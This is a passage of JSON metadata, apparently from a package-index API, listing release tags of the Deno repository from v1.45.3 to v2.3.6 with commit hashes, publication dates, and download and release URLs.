sts"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07